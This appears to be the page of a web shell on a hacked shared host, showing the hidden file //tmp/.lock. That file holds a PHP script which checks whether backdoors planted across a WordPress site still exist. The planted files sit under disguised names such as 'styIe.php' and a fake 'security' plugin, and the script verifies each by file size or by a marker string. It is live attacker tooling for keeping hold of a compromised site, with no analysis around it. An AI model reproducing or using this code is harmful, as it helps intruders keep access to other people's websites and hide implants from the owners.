HEX
Server: Apache
System: Linux iad1-shared-b7-16 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_3gsgvh (5795692)
PHP: 8.2.26
Disabled: NONE
Upload Files
File: //tmp/.lock
<?php   $r = '/home/jakethepen/jakethepen.com'; $x = ["/index.php"=>"bd@@48687@@If-Modified-Since",
"/wp-includes/html-api/front.page.template.1748027118.php"=>"bd@@264489@@727",
"/wp-content/themes/custom-file-2-1748020391/styIe.php"=>"bd@@257846@@727",
"/wp-includes/block-patterns.php"=>"bd@@207706@@secure_access",
"/wp-content/plugins/security-1748014870/wp-config.php"=>"bd@@253096@@727",
"/wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/schema/ActionScheduler_StoreSchema.php"=>"bd@@357572@@93",
"/wp-content/plugins/woocommerce/patterns/page-coming-soon-image-gallery.php"=>"bd@@207337@@$_COOKIE[-"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');